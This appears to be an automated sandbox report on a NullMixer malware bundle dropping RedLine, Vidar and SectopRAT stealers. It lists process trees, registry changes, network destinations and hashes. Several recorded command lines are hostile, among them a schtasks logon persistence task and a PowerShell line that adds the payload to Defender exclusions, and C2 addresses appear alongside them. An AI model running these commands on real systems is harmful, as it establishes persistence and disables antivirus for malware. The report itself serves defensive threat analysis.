memory/4648-266-0x0000000007A20000-0x0000000007AB6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | dc058ebc0f8181946a312f0be99ed79c |
| SHA1 | 0c6f376ed8f2d4c275336048c7c9ef9edf18bff0 |
| SHA256 | 378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a |
| SHA512 | 36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa |
\??\pipe\LOCAL\crashpad_3076_JQQLSOGSOTFHNEIW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | efe4c40a4047904ba49903c0916832ab |
| SHA1 | 7ca7e3712f047343e52d753648f6f7c4787f3706 |
| SHA256 | 6aa35055139b97ceb0f01a2a6f78ac175d19bdd0b7366c98d6f5da567cc8a4a4 |
| SHA512 | 4455845884f5f273e50bd34910078caa442971dff64d295994c9d2c2d0cc68301a3a88bdae70e97f49e8ad87a2779d23a2215afab2a446b1843d278e5c3c6b45 |
memory/4648-274-0x00000000079A0000-0x00000000079B1000-memory.dmp
memory/4648-275-0x00000000079D0000-0x00000000079DE000-memory.dmp
memory/4648-276-0x00000000079E0000-0x00000000079F4000-memory.dmp
memory/4648-277-0x0000000007AE0000-0x0000000007AFA000-memory.dmp
memory/4648-278-0x0000000007AC0000-0x0000000007AC8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4119bdbeae429197de1d78250e3a89a6 |
| SHA1 | bd2a79c82540eccf13e14e657a4dd21f4a90b6f6 |
| SHA256 | 8db4af0bdfe9b061291db46510b8c5a4abe0bcd0d2e3ac0dde9a21eb8fbfa372 |
| SHA512 | fe468d5bc2c39efcaa0e309b2f51ad9c66e810d7ce7687e744de4ce01f5036da02fc70159aeeb9a0a827c9d7987b9e52f2f949f1a65fef6740716904dc57c34b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1e7dc506a2b8ed7ed0fcb8d42619fe5d |
| SHA1 | 9d332b0a8724087c0e93611473b1d0e278d82301 |
| SHA256 | d91f02b5e6b1f70abf110663d378d1f655d137b7b515ab737dccc3435c9926ba |
| SHA512 | 2dc6018f38e6a66aaaf92038de692fdbca033932663adfa4320e16ca791cdddb9befe0844686a269e0dddcb5869021476283009a9e188171c2ba5a8f1361c5be |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | be0b4b1c809dc419f44b990378cbae31 |
| SHA1 | 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806 |
| SHA256 | 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53 |
| SHA512 | 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24 |
memory/5648-326-0x0000000000F60000-0x0000000000F66000-memory.dmp
memory/5796-332-0x0000000000A30000-0x0000000000A50000-memory.dmp
memory/5796-329-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-331-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-336-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-337-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-335-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-333-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-334-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-338-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-339-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-366-0x0000000140000000-0x0000000140786000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 4bc8a3540a546cfe044e0ed1a0a22a95 |
| SHA1 | 5387f78f1816dee5393bfca1fffe49cede5f59c1 |
| SHA256 | f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca |
| SHA512 | e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-06 12:12
Reported
2024-12-06 12:15
Platform
win7-20240903-en
Max time kernel
63s
Max time network
150s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2992 set thread context of 868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7AE71BD1-B3CB-11EF-A5D8-F2DF7204BD4F} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c caa4baaf544.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 621c13b77.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
24ebc9ce784c63.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe
621c13b77.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
c0f099be1ace2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe
caa4baaf544.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe
6f1aa71747b4a291.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe
3d1f9c2a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe
09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe
e4f0738cc5646a38.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe
d55cc0d45c3a05.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe
"C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe" -a
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 272
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487157 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 964
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSBA69.tmp\Install.cmd" "
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2376 CREDAT:275457 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 104.26.4.15:443 | api.db-ip.com | tcp |
| N/A | 127.0.0.1:49291 | N/A | tcp |
| N/A | 127.0.0.1:49293 | N/A | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.28.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | N/A | tcp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.18:443 | lenak513.tumblr.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| SG | 37.0.11.8:80 | N/A | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 184.50.113.144:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 72.246.29.11:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | N/A | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| SG | 37.0.10.236:80 | N/A | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| SG | 37.0.10.236:80 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| SG | 37.0.10.236:80 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| SG | 37.0.10.236:80 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
| MD5 | 68a59b521798b22a72d30dd7ff6eb04a |
| SHA1 | 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da |
| SHA256 | e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc |
